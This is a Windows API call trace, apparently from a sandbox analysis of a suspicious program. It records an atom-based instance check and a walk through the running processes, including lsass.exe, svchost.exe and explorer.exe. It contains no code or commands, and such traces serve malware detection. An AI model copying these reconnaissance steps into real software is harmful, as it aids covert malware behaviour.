	[0128.257] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.258] GetLastError () returned 0x5
	[0128.259] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.259] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.259] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.259] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.260] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetLastError () returned 0x5
	[0128.261] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.262] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.262] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.262] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.262] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.262] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.262] CloseHandle (hObject=0x2dc) returned 1
	[0128.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0128.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.263] CloseHandle (hObject=0x2dc) returned 1
	[0128.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0128.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.263] CloseHandle (hObject=0x2dc) returned 1
	[0128.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0128.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.264] CloseHandle (hObject=0x2dc) returned 1
	[0128.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0128.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.264] CloseHandle (hObject=0x2dc) returned 1
	[0128.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0128.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.264] CloseHandle (hObject=0x2dc) returned 1
	[0128.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0128.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0128.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0128.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0128.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0128.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0128.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0128.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0128.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0128.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0128.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0128.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0128.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0128.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0128.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0128.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0128.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0128.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0128.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0128.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.307] CloseHandle (hObject=0x2dc) returned 1
	[0128.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0128.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0128.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0128.308] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.308] CloseHandle (hObject=0x2dc) returned 1
	[0128.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0128.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0128.309] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.309] CloseHandle (hObject=0x2dc) returned 1
	[0128.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0128.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.310] CloseHandle (hObject=0x2dc) returned 1
	[0128.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0128.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.310] CloseHandle (hObject=0x2dc) returned 1
	[0128.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0128.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.310] CloseHandle (hObject=0x2dc) returned 1
	[0128.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0128.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.311] CloseHandle (hObject=0x2dc) returned 1
	[0128.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0128.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.311] CloseHandle (hObject=0x2dc) returned 1
	[0128.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0128.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0128.312] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.312] CloseHandle (hObject=0x2dc) returned 1
	[0128.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0128.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.313] CloseHandle (hObject=0x2dc) returned 1
	[0128.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0128.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.313] CloseHandle (hObject=0x2dc) returned 1
	[0128.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0128.313] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.314] CloseHandle (hObject=0x2dc) returned 1
	[0128.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0128.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.314] CloseHandle (hObject=0x2dc) returned 1
	[0128.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0128.314] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.314] CloseHandle (hObject=0x2dc) returned 1
	[0128.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0128.315] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.315] CloseHandle (hObject=0x2dc) returned 1
